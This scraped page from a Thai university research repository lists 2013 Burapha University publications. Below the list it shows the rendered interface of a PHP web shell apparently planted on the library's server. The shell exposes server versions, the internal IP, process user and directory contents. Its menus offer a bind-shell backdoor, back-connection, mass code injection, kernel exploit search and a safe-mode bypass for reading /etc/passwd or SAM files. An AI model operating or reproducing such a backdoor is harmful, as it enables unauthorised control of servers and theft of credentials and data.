งานวิจัยมหาวิทยาลัยบูรพา

Found 2093 results
Author Keyword Title [ Year(Asc)]
2556
วิเชียร ชาลี., Wichian Chalee. ระดับคลอไรด์วิกฤติในคอนกรีตที่ผสมเถ้าแกลบเปลือกไม้ที่แช่ในสภาวะแวดล้อมทะเล. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
วัชรินทร์ ดงบัง., Watcharin Dongbang. รังสีอินฟราเรดและการประยุกต์ใช้ในอุตสาหกรรมอาหาร. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
สุเนตร สุวรรณละออง, Sunate Suwanlaong., สุธิดา แจ้งประจักษ์., Suthida Changprachak. รูปแบบการจัดการปัญหาอาชญากรรมของสถานีตำรวจภูธรเมืองพัทยา. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(37)
สุธิดา แจ้งประจักษ์., Suthida Changprachak. รูปแบบการจัดสวัสดิการผู้สูงอายุ: กรณีศึกษาตำบลหนองรี อำเภอเมือง จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ยุวดี รอดจากภัย., กุลวดี โรจน์ไพศาลกิจ., ไพบูลย์ พงษ์แสงพันธ์., Yuwadee Rodjarkpai., Kunwadee Rojpaisarnkit., Paiboon Pongsaengpan. รูปแบบการพัฒนาชุมชนและครอบครัวต้นแบบเพื่อดูแลผู้สูงอายุแบบบูรณาการ (ปีที่ 2). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
พิสิษฐ์ พิริยาพรรณ., Pisit Piriyapun, เวธกา กลิ่นวิชิต., Wethaka Klinwichit., พวงทอง อินใจ., Puangtong Inchai., สิริลักษณ์ โสมานุสรณ์., Somamanusorn. S. รูปแบบการเตรียมความพร้อมของผู้สูงอายุและครอบครัวสู่การตายอย่างสงบที่โรงพยาบาล (ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ชัชวิน เพชรเลิศ., Chatchawin Petchlert. ฤทธิ์แอนติออกซิแดนท์และฤทธิ์ยับยั้งลิพิดเปอร์ออกซิเดชันของส่วนสกัดจากพืชสมุนไพรบางชนิดจากโครงการพัฒนาป่าชุมชนบ้านอ่างเอ็ด (มูลนิธิชัยพัฒนา) จังหวัดจันทบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
วลีรัตน์ มันทุราช., Walirat Manthurat., ภารดี มหาขันธ์., Paradee Mahakhan., กังวล คัชชิมา., สมบัติ มั่งมีสุขสิริ. วัฒนธรรมคัมภีร์ใบลานของกลุ่มชาติพันธุ์เขมรในประเทศไทย. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(35)
เจด็จ คชฤทธิ์., Chaded Khotchart., ภารดี มหาขันธ์., Paradee Mahakhan., สุเนตร สุวรรณละออง, Sunate Suwanlaong., ศักดินา บุญเปี่ยม., Sakdina Bunpiem. วัฒนธรรมทางเพศของผู้ชายไทยในสังคมเมือง จังหวัดชลบุรี ช่วง พ.ศ. 2501-2552. วารสารการเมือง การบริหาร และกฎหมาย = Journal of politics, administration and law. 2556;5(2)
อุบลลักษณ์ รัตนศักดิ์., Ubolluk Rattanasak. วัสดุจีโอโพลิเมอร์ที่ผลิตจากเถ้าลอยจากกระบวนการเผาถ่านหินแบบฟลูอิดไดซ์เบด และสารประกอบอะลูมิเนียมไฮดรอกไซด์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สุนันทา โอศิริ., มยุรี พิทักษ์ศิลป์., พัชชาพลอย ศรีประเสริฐ., พรรณภัทร อินทฤทธิ์., วรัมพา สุวรรณรัตน์., สถาพร บัวธรา., Sunantha Osiri., Mayuri Phithaksilp., Patchaphoi Sriprasert., Phannapat Intharit., Warumpa Suwannarat. วิถีสุขภาพด้านการแพทย์แผนไทยของผู้สูงอายุในเขตเทศบาลแสนสุข. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อัญชลี จันทร์คง., สุวรรณา ภาณุตระกูล., วิภูษิต มัณฑะจิตร., Narinratana Kongjandtre., Anchalee Chankong., Suwanna Panutrakul., Vipoosit Manthachitra. ศักยภาพการทดแทนประชากรปะการังในแนวปะการังจังหวัดระยองหลังจากเหตุการณ์ปะการังฟอกขาวปีพ.ศ. 2553. วารสารวิทยาศาสตร์บูรพา 2556;18(2)
นรินทร์รัตน์ คงจันทร์ตรี., อัญชลี จันทร์คง., สุวรรณา ภาณุตระกูล., วิภูษิต มัณฑะจิตร., Narinratana Kongjandtre., Anchalee Chankong., Suwanna Panutrakul., Vipoosit Manthachitra. ศักยภาพการทดแทนประชากรปะการังในแนวปะการังจังหวัดระยองหลังจากเหตุการณ์ปะการังฟอกขาว ปี พ.ศ.2553. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
ณิษา สิรนนท์ธนา., จารุนันท์ ประทุมยศ., จันทร์จรัส วัฒนะโชติ., Nisa Siranonthana., Jarunan Pratoomyot., Janjarus Watanachote. ศักยภาพของจุลินทรีย์ทะเล: แหล่งกรดไขมันชนิดจำเป็น. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ภารดี อนันต์นาวี., Paradee Anannawee. สภาพ ปัญหาและแนวทางพัฒนาการบริหารของผู้บริหาร สถานศึกษาขั้นพื้นฐานภาคตะวันออกสู่อาเซียน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สุวรรณา จันทร์ประเสริฐ., แอนนา สุมะโน., Suwanna Junprasert., Anna Sumano. สภาพจิตสังคมจากการตรวจคัดกรองโรคเลือดจางธาลัสซีเมียของประชากรวัยเจริญพันธุ์ ตำบลทุ่งสุขลา อำเภอศรีราชา จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
พินแสง ยุนแซงวา., ฤทธิกร ศิริประเสริฐโชค., Rittikorn Siriprasertchok. สภาพปัญหาและความต้องการการสนับสนุนจากภาครัฐเพื่อพัฒนาศักยภาพของผู้ประกอบการวิสาหกิจขนาดกลางและขนาดย่อมในจังหวัดหัวพัน ประเทศสาธารณรัฐประชาธิปไตยประชาชนลาว. วารสารการเมือง การบริหาร และกฎหมาย = Journal of Politics, administration and Law 2556;5(1)
วารุณี ช้างใหญ่., กุหลาบ รัตนสัจธรรม., ชิงชัย เมธพัฒน์., Warunee Changyai., Koolarb Rudtanasudjatum., Chingchai Methaphat. สมรรถนะนักสาธารณสุขเพื่อเตรียมรองรับสถานการณ์ประชาชนมีอายุขัยเฉลี่ย 80 ปี. วารสารสาธารณสุขมหาวิทยาลัยบูรพา = The Public Health Journal of Burapha University. 2556;8(1)
ปรีดี พิศภูมิวิถี., Predee Phisphumvidhi. สังคมอยุธยาในเอกสารฝรั่งเศสในรัชกาลสมเด็จพระนารายณ์มหาราช (พ.ศ. ๒๑๙๙ - พ.ศ. ๒๒๓๑). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สุบัณฑิต นิ่มรัตน์., อรสา สุริยาพันธ์., วีรพงศ์ วุฒิพันธุ์ชัย., Subuntith Nimrat., Orasa Suriyaphan., Verapong Vuthiphandchai. สารต้านจุลชีพชนิใหม่จากแบคทีเรียโพรไบโอติกเพื่อใช้ในการควบคุมมาตรฐานทางแบคทีเรียในผลิตภัณฑ์อาหารทะเลแห้งและแปรรูปในจังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ทนงศักดิ์ ยิ่งรัตนสุข., วัลลภ ใจดี., Anamai Thetkathuek., Tanongsak Yingratanasuk., Wanlop Jaidee. สิ่งคุกคามทางอาชีวอนามัยและผลกระทบต่อสุขภาพของแรงงานข้ามชาติในกระบวนการผลิตของโรงงานอุตสาหกรรมอาหารแช่แข็ง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
พงษ์รัตน์ ดำรงโรจน์วัฒนา., Pongrat Dumrangrojwattana. หอยจิ๋วทะเลในพื้นที่ปกปักพันธุกรรมพืชทางทะเล หมู่เกาะแสมสาร จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
วารี เนื่องจำนงค์., วิสาตรี คงเจริญสุนทร., Waree Naengchomnong., Wisatre Kongcharoensuntorn. องค์ประกอบทางเคมีและฤทธิ์ต้านจุลินทรีย์ของสารบริสุทธิ์จากรักดำ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กันทิมา สุวรรณพงศ์., Guntima Suwannapong. อัตราการติดเชื้อและผลของพรอพอลิสต่อการติดเชื้อ Nosema ceranae ของทางเดินอาหารส่วนกลางและต่อมไฮโปฟาริงค์ของผึ้งในประเทศไทย. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ศศิธร มั่นเจริญ., Sasithorn Muncharoen. เทคนิคการแยกสารในสถานะแก๊สที่ประยุกต์ใช้สำหรับการวิเคราะห์แบบไหล. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)

Pages

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
  _____ _   ___     __ _____ _          _ _ 
 / ____| \ | \ \   / // ____| |        | | |
| |  __|  \| |\ \_/ /| (___ | |__   ___| | |
| | |_ | . ` | \   /  \___ \| '_ \ / _ \ | |
| |__| | |\  |  | | _ ____) | | | |  __/ | |
                          \_____|_| \_|  |_|(_)_____/|_| |_|\___|_|_|  {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 278.72 GB of 389.83 GB (71.5%)Server IP: 10.32.1.15 - Your IP: 54.237.235.12

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 22.11.2014 14:57:42 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 14.08.2014 08:51:27 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0184 ]:.